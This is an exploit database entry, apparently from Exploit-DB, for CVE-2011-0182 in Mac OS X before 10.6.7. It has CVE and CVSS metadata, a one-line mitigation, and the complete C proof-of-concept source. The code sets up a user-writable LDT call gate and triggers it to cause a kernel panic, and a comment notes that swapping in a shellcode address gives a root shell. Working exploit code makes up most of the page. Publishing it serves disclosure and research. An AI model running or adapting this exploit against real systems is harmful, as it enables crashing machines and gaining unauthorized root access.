Mac OS X < 10.6.7 Kernel Panic Exploit

vendor:

Mac OS X

by:

Chanam Park (hkpco)

7.8

CVSS

HIGH

Kernel Panic Exploit

119

CWE

Product Name: Mac OS X

Affected Version From: Mac OS X < 10.6.7

Affected Version To: Mac OS X < 10.6.7

Patch Exists: YES

Related CWE: CVE-2011-0182

CPE: o:apple:mac_os_x

Metasploit: https://www.rapid7.com/db/vulnerabilities/apple-osx-airport-cve-2011-0182/, https://www.rapid7.com/db/vulnerabilities/apple-osx-kernel-cve-2011-0182/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Hackintosh for AMD

2011

Mac OS X < 10.6.7 Kernel Panic Exploit

This exploit is related to CVE-2011-0182 and is a proof of concept code. It is written in C language and is compiled using gcc. It is used to set the LDT (Local Descriptor Table) and can cause a kernel panic. It is tested on Hackintosh for AMD.

Mitigation:

The user should update their Mac OS X version to 10.6.7 or higher.

Source

Exploit-DB raw data:

/*
	Mac OS X < 10.6.7 Kernel Panic Exploit
	CVE-2011-0182, Proof Of Concept Code

	Author	- Chanam Park (hkpco)
	Date	- 2011. 06
	Contact	- chanam.park@hkpco.kr , http://hkpco.kr , @hkpco

	Thanks for inspiration / x82, riaf.
*/
// Compile: gcc -o CVE-2011-0182_PoC CVE-2011-0182_PoC.c -m32

#include <architecture/i386/table.h>
#include <i386/user_ldt.h>

#include <unistd.h>

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void dummy_func( void ) { asm volatile( ".byte 0xff" ); }

int main( void )
{
	int ret;
	union ldt_entry cgate, cgate2;
	char dummy[128] = {0x00,};

	cgate.call_gate.offset00        = (unsigned int)dummy_func & 0xffff;
	cgate.call_gate.offset16        = ((unsigned int)dummy_func >> 16) & 0xffff;
	// You can input shellcode address value here to get the root shell.
	/* I got the root shell before. But, It was tested on Hackintosh for AMD. :-p
	   The normal system has a little different environment.
	   I have no time for this anymore because of my summer break is over.
	   So.. Good Luck! */

	cgate.call_gate.argcnt          = 0;
	cgate.call_gate.type            = 0xc; // DESC_CALL_GATE
	cgate.call_gate.dpl             = 3;
	cgate.call_gate.present         = 1;

	cgate.call_gate.seg.rpl         = 0;
	cgate.call_gate.seg.ti          = 0;
	cgate.call_gate.seg.index       = 16;

	cgate2.call_gate.offset00       = 0x0;

	cgate2.call_gate.seg.rpl        = 0;
	cgate2.call_gate.seg.ti         = 0;
	cgate2.call_gate.seg.index      = 0;

	cgate2.call_gate.argcnt         = 0;
	cgate2.call_gate.type           = 0;
	cgate2.call_gate.dpl            = 0;
	cgate2.call_gate.present        = 1;

	cgate2.call_gate.offset16       = 0x0;

	printf( "// coded by Chanam Park (hkpco)\n\n" );

	ret = i386_set_ldt( LDT_AUTO_ALLOC, &cgate, 1 );
	printf( "Selector Number in LDT <1>: 0x%x\n", ret );

	ret = i386_set_ldt( LDT_AUTO_ALLOC, &cgate2, 1 );
	printf( "Selector Number in LDT <2>: 0x%x\n\n", ret );

	printf( "If you run this program, it can possibly cause \"Kernel Panic\".\n" );
	printf( "The program will be continued when you input any value.\n" );
	printf( "-> " );
	fflush(stdout);
	scanf( "%s", dummy );

	asm volatile( "lcall $0x3f, $0x0" );
	// Trigger

	return 0;
}